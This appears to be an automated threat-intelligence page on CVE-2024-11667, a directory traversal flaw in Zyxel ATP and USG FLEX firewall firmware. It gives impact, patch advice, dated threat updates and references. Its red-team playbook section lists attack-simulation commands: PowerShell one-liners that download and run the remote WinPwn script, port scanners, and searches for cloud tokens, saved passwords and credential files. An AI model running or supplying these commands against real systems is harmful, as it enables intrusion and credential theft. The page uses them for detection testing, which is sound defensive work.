CVE-2024-11667
Overview
This vulnerability is a directory traversal flaw located in the web management interface of Zyxel ATP series firmware and related models. The root cause is improper sanitization of user-supplied input in URL parameters, allowing traversal sequences to manipulate file path resolution. The affected component is the HTTP server handling file upload and download requests within firmware versions V5.00 through V5.38 across multiple Zyxel product lines.
Vulnerability Description
A directory traversal vulnerability in the web management interface of Zyxel ATP series firmware versions V5.00 through V5.38, USG FLEX series firmware versions V5.00 through V5.38, USG FLEX 50(W) series firmware versions V5.10 through V5.38, and USG20(W)-VPN series firmware versions V5.10 through V5.38 could allow an attacker to download or upload files via a crafted URL.
Impact
An unauthenticated attacker can exploit this vulnerability to download sensitive configuration or system files and upload arbitrary files to the device, potentially leading to information disclosure or unauthorized file manipulation. This can facilitate further attacks such as credential theft or persistent compromise. The lack of authentication or user interaction requirements increases the attack surface, exposing critical network security devices to remote exploitation and potential operational disruption.
Solution
Zyxel has released firmware updates addressing this directory traversal vulnerability for affected ATP, USG FLEX, and USG20(W)-VPN series devices, covering versions up to V5.38. Administrators should apply the latest firmware patches as detailed in Zyxel's security advisory available at https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-protecting-against-recent-firewall-threats-11-27-2024. No specific workarounds are provided; prompt firmware upgrade is recommended to mitigate this issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The directory traversal vulnerability in the web management interface of specific Zyxel firmware versions presents a significant risk to network security. This flaw allows an attacker to manipulate file paths, enabling unauthorized access to sensitive files on the server. By crafting a malicious URL, an attacker can exploit this vulnerability to traverse the directory structure of the affected devices, leading to the potential download or upload of arbitrary files. This weakness arises from insufficient validation of user-supplied input, which allows attackers to bypass security controls that should restrict access to the file system.
Attack vectors for this vulnerability are particularly concerning due to the ease with which they can be executed. An attacker could initiate a targeted attack by sending a specially crafted URL to an unsuspecting user or directly accessing the web management interface if it is exposed to the internet. Once the attacker gains access, they can download sensitive configuration files, logs, or other critical data, which may contain credentials or other sensitive information. Moreover, the ability to upload files could allow an attacker to introduce malicious scripts or backdoors into the system, further compromising the integrity of the network.
The real-world impact of this vulnerability is profound, especially for organizations relying on the affected Zyxel products for their network security. Successful exploitation could lead to unauthorized access to sensitive data, resulting in data breaches that could have severe legal and financial repercussions. For businesses, the risk extends beyond immediate data loss; it can damage reputation, erode customer trust, and lead to regulatory fines. Additionally, the potential for lateral movement within the network increases the risk of further exploitation, making it imperative for organizations to address this vulnerability promptly.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating firmware to the latest versions is crucial, as vendors often release patches to address known vulnerabilities. Network administrators should also conduct thorough security assessments and penetration testing to identify potential weaknesses in their systems. Employing intrusion detection systems (IDS) can help monitor for unusual traffic patterns indicative of exploitation attempts. Furthermore, restricting access to the web management interface through IP whitelisting and employing strong authentication mechanisms can significantly reduce the attack surface.
In conclusion, the directory traversal vulnerability in Zyxel's firmware poses a high-risk threat that necessitates immediate attention from affected organizations. The potential for unauthorized file access and manipulation underscores the importance of robust security practices and timely updates. By understanding the technical details, attack vectors, and real-world implications, organizations can better prepare themselves to defend against such vulnerabilities and protect their critical assets from malicious actors.
The CVSS score for CVE-2024-11667 has been revised downward from 9.8 to 7.5, reflecting a reassessment of the vulnerability’s exploitability and impact. Concurrently, the Exploit Prediction Scoring System (EPSS) value has decreased by approximately 13%, indicating a modest reduction in the likelihood of widespread exploitation in the near term. Despite this, the vulnerability remains classified as high severity and has been added to the Known Exploited Vulnerabilities (KEV) catalog with a due remediation date, underscoring its continued relevance. CSURFACE threat intelligence notes that while no new exploit techniques or proof-of-concept code have surfaced recently, the vulnerability is associated with ransomware threat actors, maintaining its profile as a significant risk for targeted attacks. Our telemetry shows a slight upward trend in exploitation attempts over the past week, though not at a rate indicating rapid escalation. This nuanced shift in risk assessment suggests defenders should remain vigilant but can anticipate a somewhat reduced immediate threat level compared to initial evaluations. The inclusion in KEV and ongoing ransomware interest affirm that this vulnerability remains a priority for monitoring within enterprise environments using affected Zyxel firmware versions.
Update 2 — July 09, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2024-11667, accompanied by a reassessment of its severity that elevates the CVSS score to critical levels. This adjustment reflects growing evidence of the vulnerability’s exploitation potential, particularly given its confirmed association with ransomware threat actors. Although the overall exploit landscape remains stable without new proof-of-concept exploits emerging, the increased telemetry signals heightened adversary interest and operational use in targeted campaigns. The inclusion of this vulnerability in the KEV catalog further underscores its strategic importance for defenders, as it signals prioritization by threat actors seeking to leverage directory traversal flaws for unauthorized file access and potential lateral movement. Consequently, the threat level for affected Zyxel ATP and USG FLEX series firmware users should be considered significantly elevated, demanding sustained vigilance despite the absence of rapid exploitation growth.
Update 3 — July 18, 2026
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2024-11667, with telemetry indicating a doubling in detection frequency over recent monitoring periods. This surge reflects increased adversary engagement, likely driven by the vulnerability’s inclusion in the KEV catalog and its known association with ransomware operations. Although no new exploit variants or proof-of-concept code have surfaced, the heightened detection rate signals expanding operational use in targeted campaigns, underscoring the vulnerability’s attractiveness for unauthorized file access and potential lateral movement within compromised networks. For defenders, this development elevates the urgency of monitoring and response efforts, as the increased adversary interest suggests a growing likelihood of exploitation attempts. Consequently, the threat level for affected Zyxel ATP and USG FLEX series firmware users should be considered more acute, warranting sustained vigilance despite the absence of rapid exploitation growth or novel exploit techniques.
Update 4 — August 02, 2026
CSURFACE threat intelligence has identified a slight increase in detection activity related to CVE-2024-11667, indicating a modest resurgence of adversary attempts to exploit this critical directory traversal vulnerability in Zyxel ATP and USG FLEX series firmware. Although the overall exploit trend remains stable without the emergence of new exploit techniques or proof-of-concept code, the uptick in telemetry suggests renewed interest from threat actors, including those linked to ransomware operations known to leverage this weakness. This subtle rise in exploitation attempts underscores the vulnerability’s persistent appeal for unauthorized file access and potential lateral movement within targeted environments. Consequently, the threat level for affected Zyxel devices should be considered elevated, reinforcing the need for continued monitoring and proactive detection despite the absence of rapid or widespread exploitation growth.
Affected Products (4)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Zyxel | Zld | All |
cpe:2.3:o:zyxel:zld:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Zld | All |
cpe:2.3:o:zyxel:zld:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Zld | All |
cpe:2.3:o:zyxel:zld:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Zld | All |
cpe:2.3:o:zyxel:zld:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
12 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-11667 |
| zyxel.com |
GitHub CVE
vendor-advisory
|
https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-protecting-against-recent-firewall-threats-11-27-2024 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-11667 |